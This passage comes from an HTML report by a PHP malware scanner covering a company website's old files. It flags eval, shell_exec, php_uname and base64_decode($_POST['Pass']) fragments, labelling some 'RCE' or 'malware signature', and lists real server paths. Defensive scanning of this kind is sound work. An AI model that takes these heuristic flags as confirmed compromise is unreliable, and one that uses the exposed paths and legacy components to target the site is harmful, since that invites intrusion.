shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(&nbsp;</span><span style="color: #0000BB">stripslashes</span><span style="color: #007700">(</span><span style="color: #0000BB">$input_arr</span><span style="color: #007700">[</span><span style="color: #DD0000">'value'</span><span style="color: #007700">][</span><span style="color: #0000BB">$i</span><span style="color: #007700">]));&nbsp;</span><span style="color: #0000BB">$values&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">stripslashes</span><span style="color: #007700">(</span><span style="color: #0000BB">ob_get_contents</span><span style="color: #007700">());&nbsp;</span><span style="color: #0000BB">ob_end_clean</span><span style="color: #007700">();&nbsp;</span><span style="color: #0000BB">$input_code&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #0000BB">$input_arr</span><span style="color: #007700">[</span><span style="color: #DD0000">'macros'</span><span style="color: #007700">][</span><span style="color: #0000BB">$i</span><span style="color: #007700">],&nbsp;</span><span style="color: #0000BB">$values</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$input_code</span><span style="color: #007700">);&nbsp;}&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">$input_code</span><span style="color: #007700">;&nbsp;}&nbsp;else&nbsp;return&nbsp;</span><span style="color: #0000BB">$input_code</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">pars_lng</span><span style="color: #007700">(</span><span style="color: #0000BB">$input_code</span><span style="color: #007700">)&nbsp;{&nbsp;global&nbsp;</span><span style="color: #0000BB">$SYS</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$out&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #0000BB">$SYS</span><span style="color: #007700">[</span><span style="color: #DD0000">'translate'</span><span style="color: #007700">][</span><span style="color: #DD0000">'lng_macro'</span><span style="color: #007700">],&nbsp;</span><span style="color: #0000BB">$SYS</span><span style="color: #007700">[</span><span style="color: #DD0000">'translate'</span><span style="color: #007700">][</span><span style="color: #DD0000">'lng_trans'</span><span style="color: #007700">],&nbsp;</span><span style="color: #0000BB">$input_code</span><span style="color: #007700">);&nbsp;return&nbsp;</span><span style="color: #0000BB">$out</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">pars_out_text_all</span><span style="color: #007700">(</span><span style="color: #0000BB">$phrase</span><span style="color: #007700">)&nbsp;{&nbsp;global&nbsp;</span><span style="color: #0000BB">$SYS</span><span style="color: #007700">;&nbsp;global&nbsp;</span><span style="color: #0000BB">$conn</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$tpl_sq1&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"select&nbsp;name,&nbsp;code,&nbsp;subload&nbsp;from&nbsp;...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_77").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/old.liko-holding.com.ua/modules/template/tpl.com.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.96 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:50</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:41</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_78" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$code</span><span style="color: #007700">,</span><span style="color: #0000BB">2</span><span style="color: #007700">));&nbsp;</span><span style="color: #0000BB">$out_code&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">ob_get_contents</span><span style="color: #007700">();&nbsp;</span><span style="color: #0000BB">ob_end_clean</span><span style="color: #007700">();&nbsp;}&nbsp;else&nbsp;{&nbsp;</span><span style="color: #0000BB">ob_start</span><span style="color: #007700">();&nbsp;include&nbsp;</span><span style="color: #0000BB">$file</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$out_code&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">ob_get_contents</span><span style="color: #007700">();&nbsp;</span><span style="color: #0000BB">ob_end_clean</span><span style="color: #007700">();&nbsp;}&nbsp;}&nbsp;</span><span style="color: #0000BB">$out_code&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">pars_banner</span><span style="color: #007700">(</span><span style="color: #0000BB">$out_code</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$SYS</span><span style="color: #007700">[</span><span style="color: #DD0000">'banners'</span><span style="color: #007700">]);&nbsp;if(</span><span style="color: #0000BB">USE_MULTI_LANG&nbsp;</span><span style="color: #007700">!=&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">)&nbsp;</span><span style="color: #0000BB">$out_code&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">pars_lng</span><span style="color: #007700">(</span><span style="color: #0000BB">$out_code</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_78").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/old.liko-holding.com.ua/first/sealake/account.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.30 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:35</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_79" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 60</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'Pass'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_79").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/old.liko-holding.com.ua/first/sealake/phplib/pear.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 32.40 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:35</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_80" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #DD0000">'$e&nbsp;=&nbsp;new&nbsp;Exception($this-&gt;message,&nbsp;$this-&gt;code);$e-&gt;PEAR_Error&nbsp;=&nbsp;$this;throw($e);'</span><span style="color: #007700">);&nbsp;}&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">getMode</span><span style="color: #007700">()&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">mode</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">getCallback</span><span style="color: #007700">()&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">callback</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">getMessage</span><span style="color: #007700">()&nbsp;{&nbsp;return&nbsp;(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">error_message_prefix&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">message</span><span style="color: #007700">);&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">getCode</span><span style="color: #007700">()&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">code</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">getType</span><span style="color: #007700">()&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">get_class</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">);&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">getUserInfo</span><span style="color: #007700">()&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">userinfo</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">getDebugInfo</span><span style="color: #007700">()&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">getUserInfo</span><span style="color: #007700">();&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">getBacktrace</span><span style="color: #007700">(</span><span style="color: #0000BB">$frame&nbsp;</span><span style="color: #007700">=&nbsp;...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_80").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/old.liko-holding.com.ua/first/sealake/wssl/account.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 2.83 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:35</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_81" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 60</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'Pass'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_81").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/old.liko-holding.com.ua/first/admin/account.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.10 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:34</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_82" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 89</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'Pass'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_82").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/old.liko-holding.com.ua/first/admin/phplib/pear.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 32.40 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:34</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_83" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #DD0000">'$e&nbsp;=&nbsp;new&nbsp;Exception($this-&gt;message,&nbsp;$this-&gt;code);$e-&gt;PEAR_Error&nbsp;=&nbsp;$this;throw($e);'</span><span style="color: #007700">);&nbsp;}&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">getMode</span><span style="color: #007700">()&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">mode</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">getCallback</span><span style="color: #007700">()&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">callback</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">getMessage</span><span style="color: #007700">()&nbsp;{&nbsp;return&nbsp;(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">error_message_prefix&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">message</span><span style="color: #007700">);&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">getCode</span><span style="color: #007700">()&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">code</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">getType</span><span style="color: #007700">()&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">get_class</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">);&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">getUserInfo</span><span style="color: #007700">()&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">userinfo</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">getDebugInfo</span><span style="color: #007700">()&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">getUserInfo</span><span style="color: #007700">();&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">getBacktrace</span><span style="color: #007700">(</span><span style="color: #0000BB">$frame&nbsp;</span><span style="color: #007700">=&nbsp;...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_83").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/old.liko-holding.com.ua/first/admin/wssl/account.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.14 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:34</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_84" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 90</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'Pass'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_84").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/old.liko-holding.com.ua/first/fckeditor/editor/filemanager/browser/default/connectors/php/util.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 4.20 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:34</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_85" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_85").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/old.liko-holding.com.ua/first/fckeditor/editor/filemanager/connectors/php/util.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 4.20 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:34</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_86" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_86").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/old.liko-holding.com.ua/first/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.50 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:34</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_87" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$cmd&nbsp;</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">$linesout&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">explode</span><span style="color: #007700">(&nbsp;</span><span style="color: #DD0000">"\n"</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$aspellret&nbsp;</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$index&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$text_input_index&nbsp;</span><span style="color: #007700">=&nbsp;-</span><span style="color: #0000BB">1</span><span style="color: #007700">;&nbsp;foreach(&nbsp;</span><span style="color: #0000BB">$linesout&nbsp;</span><span style="color: #007700">as&nbsp;</span><span style="color: #0000BB">$key</span><span style="color: #007700">=&gt;</span><span style="color: #0000BB">$val&nbsp;</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$chardesc&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">substr</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$val</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">1&nbsp;</span><span style="color: #007700">);&nbsp;if(&nbsp;</span><span style="color: #0000BB">$chardesc&nbsp;</span><span style="color: #007700">==&nbsp;</span><span style="color: #DD0000">'&amp;'&nbsp;</span><span style="color: #007700">||&nbsp;</span><span style="color: #0000BB">$chardesc&nbsp;</span><span style="color: #007700">==&nbsp;</span><span style="color: #DD0000">'#'&nbsp;</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$line&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">explode</span><span style="color: #007700">(&nbsp;</span><span style="color: #DD0000">"&nbsp;"</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$val</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">5&nbsp;</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">print_words_elem</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$line</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">],&nbsp;</span><span style="color: #0000BB">$index</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$text_input_index&nbsp;</span><span style="color: #007700">);&nbsp;if(&nbsp;isset(&nbsp;</span><span style="color: #0000BB">$line</span><span style="color: #007700">[</span><span style="color: #0000BB">4</span><span style="color: #007700">]&nbsp;))&nbsp;{&nbsp;</span><span style="color: #0000BB">$suggs&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">explode</span><span style="color: #007700">(&nbsp;</span><span style="color: #DD0000">",&nbsp;"</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$line</span><span style="color: #007700">[</span><span style="color: #0000BB">4</span><span style="color: #007700">]&nbsp;);&nbsp;}&nbsp;else&nbsp;{&nbsp;</span><span style="color: #0000BB">$suggs&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;}&nbsp;</span><span style="color: #0000BB">print_suggs_elem</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$suggs</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$index</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$text_input_index&nbsp;</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$index</span><span style="color: #007700">++;&nbsp;}&nbsp;elseif(&nbsp;</span><span style="color: #0000BB">$chardesc&nbsp;</span><span style="color: #007700">==&nbsp;</span><span style="color: #DD0000">'*'&nbsp;</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$text_inp</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_87").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/old.liko-holding.com.ua/first/first/phplib/PEAR.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 32.40 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:59</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:35</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_88" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #DD0000">'$e&nbsp;=&nbsp;new&nbsp;Exception($this-&gt;message,&nbsp;$this-&gt;code);$e-&gt;PEAR_Error&nbsp;=&nbsp;$this;throw($e);'</span><span style="color: #007700">);&nbsp;}&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">getMode</span><span style="color: #007700">()&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">mode</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">getCallback</span><span style="color: #007700">()&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">callback</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">getMessage</span><span style="color: #007700">()&nbsp;{&nbsp;return&nbsp;(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">error_message_prefix&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">message</span><span style="color: #007700">);&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">getCode</span><span style="color: #007700">()&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">code</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">getType</span><span style="color: #007700">()&nbsp;{&nbsp;return&nbsp;</span><span style="color: #0000BB">get_class</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">);&nbsp;}&nbsp;function&nbsp;</span><span style="color: 